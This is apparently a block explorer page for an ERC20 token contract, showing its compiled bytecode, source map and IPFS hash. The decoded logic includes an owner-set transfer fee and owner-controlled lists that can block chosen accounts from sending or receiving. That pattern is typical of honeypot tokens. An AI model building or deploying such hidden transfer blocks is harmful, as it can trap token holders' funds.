6103cd57818110156107c55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610543565b6103cd848484840361063a565b600754600160a01b900460ff16158061080357506001600160a01b03821660009081526008602052604090205460ff165b61085a5760405162461bcd60e51b815260206004820152602260248201527f54686520726563656976696e67206163636f756e7420697320696e636f72726560448201526118dd60f21b6064820152608401610543565b600754600160a81b900460ff16158061088c57506001600160a01b03831660009081526009602052604090205460ff16155b6108d85760405162461bcd60e51b815260206004820181905260248201527f5468652073656e64696e67206163636f756e7420697320696e636f72726563746044820152606401610543565b6000612710600654836108eb9190610ec4565b6108f59190610edb565b6001600160a01b03851660009081526008602052604090205490915060ff168061093757506001600160a01b03831660009081526008602052604090205460ff165b1561094457506000610969565b60075461095c9085906001600160a01b031683610a20565b6109668183610efd565b91505b6103cd848484610a20565b6005546001600160a01b031633146104075760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610543565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038316610a845760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610543565b6001600160a01b038216610ae65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610543565b6001600160a01b03831660009081526020819052604090205481811015610b5e5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610543565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36103cd565b600060208083528351808285015260005b81811015610bf157858101830151858201604001528201610bd5565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c2957600080fd5b919050565b60008060408385031215610c4157600080fd5b610c4a83610c12565b946020939093013593505050565b600080600060608486031215610c6d57600080fd5b610c7684610c12565b9250610c8460208501610c12565b9150604084013590509250925092565b8035600081900b8114610c2957600080fd5b634e487b7160e01b600052604160045260246000fd5b600080600060608486031215610cd157600080fd5b610cda84610c94565b925060208085013567ffffffffffffffff80821115610cf857600080fd5b818701915087601f830112610d0c57600080fd5b813581811115610d1e57610d1e610ca6565b8060051b604051601f19603f83011681018181108582111715610d4357610d43610ca6565b60405291825284820192508381018501918a831115610d6157600080fd5b938501935b82851015610d8657610d7785610c12565b84529385019392850192610d66565b979a979950505050604095909501359450505050565b600060208284031215610dae57600080fd5b610db782610c12565b9392505050565b600080600060608486031215610dd357600080fd5b610c7684610c94565b60008060408385031215610def57600080fd5b82359150610dff60208401610c12565b90509250929050565b60008060408385031215610e1b57600080fd5b610e2483610c12565b9150610dff60208401610c12565b600181811c90821680610e4657607f821691505b602082108103610e6657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610eaa57610eaa610e82565b5060010190565b8082018082111561035957610359610e82565b808202811582820484141761035957610359610e82565b600082610ef857634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561035957610359610e8256fea2646970667358221220ec6ce4292579a5d99589eba93f1b8d9efcb0f7bfde8755a5dd223462699f23f864736f6c63430008120033
Deployed Bytecode Sourcemap
19763:1772:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8586:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10946:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;10946:201:0;1004:187:1;9715:108:0;9803:12;;9715:108;;;1342:25:1;;;1330:2;1315:18;9715:108:0;1196:177:1;11727:261:0;;;;;;:::i;:::-;;:::i;9557:93::-;;;9640:2;1853:36:1;;1841:2;1826:18;9557:93:0;1711:184:1;20952:192:0;;;;;;:::i;:::-;;:::i;:::-;;12397:238;;;;;;:::i;:::-;;:::i;19839:70::-;;;;;-1:-1:-1;;;;;19839:70:0;;;;;;-1:-1:-1;;;;;3622:32:1;;;3604:51;;3592:2;3577:18;19839:70:0;3458:203:1;9886:127:0;;;;;;:::i;:::-;-1:-1:-1;;;;;9987:18:0;9960:7;9987:18;;;;;;;;;;;;9886:127;5797:103;;;:::i;19804:28::-;;;;;;21152:380;;;;;;:::i;:::-;;:::i;5156:87::-;5229:6;;-1:-1:-1;;;;;5229:6:0;5156:87;;8805:104;;;:::i;13138:436::-;;;;;;:::i;:::-;;:::i;10219:193::-;;;;;;:::i;:::-;;:::i;20815:129::-;;;;;;:::i;:::-;;:::i;10475:151::-;;;;;;:::i;:::-;;:::i;6055:201::-;;;;;;:::i;:::-;;:::i;8586:100::-;8640:13;8673:5;8666:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8586:100;:::o;10946:201::-;11029:4;3956:10;11085:32;3956:10;11101:7;11110:6;11085:8;:32::i;:::-;11135:4;11128:11;;;10946:201;;;;;:::o;11727:261::-;11824:4;3956:10;11882:38;11898:4;3956:10;11913:6;11882:15;:38::i;:::-;11931:27;11941:4;11947:2;11951:6;11931:9;:27::i;:::-;-1:-1:-1;11976:4:0;;11727:261;-1:-1:-1;;;;11727:261:0:o;20952:192::-;5042:13;:11;:13::i;:::-;21049:9:::1;21044:96;21069:6;:13;21065:1;:17;21044:96;;;21101:30;21108:4;21114:6;21121:1;21114:9;;;;;;;;:::i;:::-;;;;;;;21125:5;21101:6;:30::i;:::-;21084:3:::0;::::1;::::0;::::1;:::i;:::-;;;;21044:96;;;;20952:192:::0;;;:::o;12397:238::-;12485:4;3956:10;12541:64;3956:10;12557:7;12594:10;12566:25;3956:10;12557:7;12566:9;:25::i;:::-;:38;;;;:::i;:::-;12541:8;:64::i;5797:103::-;5042:13;:11;:13::i;:::-;5862:30:::1;5889:1;5862:18;:30::i;:::-;5797:103::o:0;21152:380::-;5042:13;:11;:13::i;:::-;21246:4:::1;21240:10;;-1:-1:-1::0;;21240:10:0;21236:292:::1;;21267:15;:27:::0;;-1:-1:-1;;;;21267:27:0::1;21285:9:::0;;;-1:-1:-1;;;21267:27:0::1;;::::0;;21152:380;;;:::o;21236:292::-:1;21322:4;21316:10;;-1:-1:-1::0;;21316:10:0;21312:216:::1;;21343:13;:25:::0;;-1:-1:-1;;;;21343:25:0::1;21359:9:::0;;;-1:-1:-1;;;21343:25:0::1;;::::0;;21152:380;;;:::o;21312:216::-:1;21395:4;21390:9;;:1;:9:::0;21386:142:::1;;-1:-1:-1::0;;;;;21416:15:0;::::1;21442:1;21416:15:::0;;;:9:::1;:15;::::0;;;;:27;;-1:-1:-1;;21416:27:0::1;21434:9:::0;;;21416:27:::1;::::0;;21152:380;;;:::o;21386:142::-:1;21470:4;21465:9;;:1;:9:::0;21461:67:::1;;-1:-1:-1::0;;;;;21491:13:0;::::1;21515:1;21491:13:::0;;;:7:::1;:13;::::0;;;;:25;;-1:-1:-1;;21491:25:0::1;21507:9:::0;;;21491:25:::1;::::0;;21461:67:::1;21152:380:::0;;;:::o;8805:104::-;8861:13;8894:7;8887:14;;;;;:::i;13138:436::-;13231:4;3956:10;13231:4;13314:25;3956:10;13331:7;13314:9;:25::i;:::-;13287:52;;13378:15;13358:16;:35;;13350:85;;;;-1:-1:-1;;;13350:85:0;;5829:2:1;13350:85:0;;;5811:21:1;5868:2;5848:18;;;5841:30;5907:34;5887:18;;;5880:62;-1:-1:-1;;;5958:18:1;;;5951:35;6003:19;;13350:85:0;;;;;;;;;13471:60;13480:5;13487:7;13515:15;13496:16;:34;13471:8;:60::i;10219:193::-;10298:4;3956:10;10354:28;3956:10;10371:2;10375:6;10354:9;:28::i;20815:129::-;5042:13;:11;:13::i;:::-;20891:7:::1;:14:::0;;;;20916:10:::1;:20:::0;;-1:-1:-1;;;;;;20916:20:0::1;-1:-1:-1::0;;;;;20916:20:0;;::::1;::::0;;;::::1;::::0;;20815:129::o;10475:151::-;-1:-1:-1;;;;;10591:18:0;;;10564:7;10591:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10475:151::o;6055:201::-;5042:13;:11;:13::i;:::-;-1:-1:-1;;;;;6144:22:0;::::1;6136:73;;;::::0;-1:-1:-1;;;6136:73:0;;6235:2:1;6136:73:0::1;::::0;::::1;6217:21:1::0;6274:2;6254:18;;;6247:30;6313:34;6293:18;;;6286:62;-1:-1:-1;;;6364:18:1;;;6357:36;6410:19;;6136:73:0::1;6033:402:1::0;6136:73:0::1;6220:28;6239:8;6220:18;:28::i;:::-;6055:201:::0;:::o;18570:346::-;-1:-1:-1;;;;;18672:19:0;;18664:68;;;;-1:-1:-1;;;18664:68:0;;6642:2:1;18664:68:0;;;6624:21:1;6681:2;6661:18;;;6654:30;6720:34;6700:18;;;6693:62;-1:-1:-1;;;6771:18:1;;;6764:34;6815:19;;18664:68:0;6440:400:1;18664:68:0;-1:-1:-1;;;;;18751:21:0;;18743:68;;;;-1:-1:-1;;;18743:68:0;;7047:2:1;18743:68:0;;;7029:21:1;7086:2;7066:18;;;7059:30;7125:34;7105:18;;;7098:62;-1:-1:-1;;;7176:18:1;;;7169:32;7218:19;;18743:68:0;6845:398:1;18743:68:0;-1:-1:-1;;;;;18824:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18876:32;;1342:25:1;;;18876:32:0;;1315:18:1;18876:32:0;;;;;;;18570:346;;;:::o;19207:419::-;19308:24;19335:25;19345:5;19352:7;19335:9;:25::i;:::-;19308:52;;-1:-1:-1;;19375:16:0;:37;19371:248;;19457:6;19437:16;:26;;19429:68;;;;-1:-1:-1;;;19429:68:0;;7450:2:1;19429:68:0;;;7432:21:1;7489:2;7469:18;;;7462:30;7528:31;7508:18;;;7501:59;7577:18;;19429:68:0;7248:353:1;19429:68:0;19541:51;19550:5;19557:7;19585:6;19566:16;:25;19541:8;:51::i;20230:577::-;20337:13;;-1:-1:-1;;;20337:13:0;;;;20336:14;;:29;;-1:-1:-1;;;;;;20354:11:0;;;;;;:7;:11;;;;;;;;20336:29;20328:76;;;;-1:-1:-1;;;20328:76:0;;7808:2:1;20328:76:0;;;7790:21:1;7847:2;7827:18;;;7820:30;7886:34;7866:18;;;7859:62;-1:-1:-1;;;7937:18:1;;;7930:32;7979:19;;20328:76:0;7606:398:1;20328:76:0;20424:15;;-1:-1:-1;;;20424:15:0;;;;20423:16;;:36;;-1:-1:-1;;;;;;20444:15:0;;;;;;:9;:15;;;;;;;;20443:16;20423:36;20415:81;;;;-1:-1:-1;;;20415:81:0;;8211:2:1;20415:81:0;;;8193:21:1;;;8230:18;;;8223:30;8289:34;8269:18;;;8262:62;8341:18;;20415:81:0;8009:356:1;20415:81:0;20509:17;19701:5;20538:7;;20529:6;:16;;;;:::i;:::-;:31;;;;:::i;:::-;-1:-1:-1;;;;;20575:13:0;;;;;;:7;:13;;;;;;20509:51;;-1:-1:-1;20575:13:0;;;:28;;-1:-1:-1;;;;;;20592:11:0;;;;;;:7;:11;;;;;;;;20575:28;20571:185;;;-1:-1:-1;20632:1:0;20571:185;;;20688:10;;20666:44;;20682:4;;-1:-1:-1;;;;;20688:10:0;20700:9;20666:15;:44::i;:::-;20725:19;20735:9;20725:19;;:::i;:::-;;;20571:185;20766:33;20782:4;20788:2;20792:6;20766:15;:33::i;5321:132::-;5229:6;;-1:-1:-1;;;;;5229:6:0;3956:10;5385:23;5377:68;;;;-1:-1:-1;;;5377:68:0;;9100:2:1;5377:68:0;;;9082:21:1;;;9119:18;;;9112:30;9178:34;9158:18;;;9151:62;9230:18;;5377:68:0;8898:356:1;6416:191:0;6509:6;;;-1:-1:-1;;;;;6526:17:0;;;-1:-1:-1;;;;;;6526:17:0;;;;;;;6559:40;;6509:6;;;6526:17;6509:6;;6559:40;;6490:16;;6559:40;6479:128;6416:191;:::o;14044:824::-;-1:-1:-1;;;;;14141:18:0;;14133:68;;;;-1:-1:-1;;;14133:68:0;;9461:2:1;14133:68:0;;;9443:21:1;9500:2;9480:18;;;9473:30;9539:34;9519:18;;;9512:62;-1:-1:-1;;;9590:18:1;;;9583:35;9635:19;;14133:68:0;9259:401:1;14133:68:0;-1:-1:-1;;;;;14220:16:0;;14212:64;;;;-1:-1:-1;;;14212:64:0;;9867:2:1;14212:64:0;;;9849:21:1;9906:2;9886:18;;;9879:30;9945:34;9925:18;;;9918:62;-1:-1:-1;;;9996:18:1;;;9989:33;10039:19;;14212:64:0;9665:399:1;14212:64:0;-1:-1:-1;;;;;14370:15:0;;14348:19;14370:15;;;;;;;;;;;14404:21;;;;14396:72;;;;-1:-1:-1;;;14396:72:0;;10271:2:1;14396:72:0;;;10253:21:1;10310:2;10290:18;;;10283:30;10349:34;10329:18;;;10322:62;-1:-1:-1;;;10400:18:1;;;10393:36;10446:19;;14396:72:0;10069:402:1;14396:72:0;-1:-1:-1;;;;;14514:15:0;;;:9;:15;;;;;;;;;;;14532:20;;;14514:38;;14732:13;;;;;;;;;;:23;;;;;;14784:26;;1342:25:1;;;14732:13:0;;14784:26;;1315:18:1;14784:26:0;;;;;;;14823:37;21152:380;14:548:1;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:159::-;1965:20;;1936:5;2014:20;;;2004:31;;1994:59;;2049:1;2046;2039:12;2064:127;2125:10;2120:3;2116:20;2113:1;2106:31;2156:4;2153:1;2146:15;2180:4;2177:1;2170:15;2196:1257;2295:6;2303;2311;2364:2;2352:9;2343:7;2339:23;2335:32;2332:52;;;2380:1;2377;2370:12;2332:52;2403:26;2419:9;2403:26;:::i;:::-;2393:36;;2448:2;2501;2490:9;2486:18;2473:32;2524:18;2565:2;2557:6;2554:14;2551:34;;;2581:1;2578;2571:12;2551:34;2619:6;2608:9;2604:22;2594:32;;2664:7;2657:4;2653:2;2649:13;2645:27;2635:55;;2686:1;2683;2676:12;2635:55;2722:2;2709:16;2744:2;2740;2737:10;2734:36;;;2750:18;;:::i;:::-;2796:2;2793:1;2789:10;2828:2;2822:9;2891:2;2887:7;2882:2;2878;2874:11;2870:25;2862:6;2858:38;2946:6;2934:10;2931:22;2926:2;2914:10;2911:18;2908:46;2905:72;;;2957:18;;:::i;:::-;2993:2;2986:22;3043:18;;;3077:15;;;;-1:-1:-1;3119:11:1;;;3115:20;;;3147:19;;;3144:39;;;3179:1;3176;3169:12;3144:39;3203:11;;;;3223:148;3239:6;3234:3;3231:15;3223:148;;;3305:23;3324:3;3305:23;:::i;:::-;3293:36;;3256:12;;;;3349;;;;3223:148;;;2196:1257;;3390:6;;-1:-1:-1;;;;3443:2:1;3428:18;;;;3415:32;;-1:-1:-1;;;;2196:1257:1:o;3666:186::-;3725:6;3778:2;3766:9;3757:7;3753:23;3749:32;3746:52;;;3794:1;3791;3784:12;3746:52;3817:29;3836:9;3817:29;:::i;:::-;3807:39;3666:186;-1:-1:-1;;;3666:186:1:o;3857:322::-;3931:6;3939;3947;4000:2;3988:9;3979:7;3975:23;3971:32;3968:52;;;4016:1;4013;4006:12;3968:52;4039:26;4055:9;4039:26;:::i;4184:254::-;4252:6;4260;4313:2;4301:9;4292:7;4288:23;4284:32;4281:52;;;4329:1;4326;4319:12;4281:52;4365:9;4352:23;4342:33;;4394:38;4428:2;4417:9;4413:18;4394:38;:::i;:::-;4384:48;;4184:254;;;;;:::o;4443:260::-;4511:6;4519;4572:2;4560:9;4551:7;4547:23;4543:32;4540:52;;;4588:1;4585;4578:12;4540:52;4611:29;4630:9;4611:29;:::i;:::-;4601:39;;4659:38;4693:2;4682:9;4678:18;4659:38;:::i;4708:380::-;4787:1;4783:12;;;;4830;;;4851:61;;4905:4;4897:6;4893:17;4883:27;;4851:61;4958:2;4950:6;4947:14;4927:18;4924:38;4921:161;;5004:10;4999:3;4995:20;4992:1;4985:31;5039:4;5036:1;5029:15;5067:4;5064:1;5057:15;4921:161;;4708:380;;;:::o;5093:127::-;5154:10;5149:3;5145:20;5142:1;5135:31;5185:4;5182:1;5175:15;5209:4;5206:1;5199:15;5225:127;5286:10;5281:3;5277:20;5274:1;5267:31;5317:4;5314:1;5307:15;5341:4;5338:1;5331:15;5357:135;5396:3;5417:17;;;5414:43;;5437:18;;:::i;:::-;-1:-1:-1;5484:1:1;5473:13;;5357:135::o;5497:125::-;5562:9;;;5583:10;;;5580:36;;;5596:18;;:::i;8370:168::-;8443:9;;;8474;;8491:15;;;8485:22;;8471:37;8461:71;;8512:18;;:::i;8543:217::-;8583:1;8609;8599:132;;8653:10;8648:3;8644:20;8641:1;8634:31;8688:4;8685:1;8678:15;8716:4;8713:1;8706:15;8599:132;-1:-1:-1;8745:9:1;;8543:217::o;8765:128::-;8832:9;;;8853:11;;;8850:37;;;8867:18;;:::i
Swarm Source
ipfs://ec6ce4292579a5d99589eba93f1b8d9efcb0f7bfde8755a5dd223462699f23f8
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.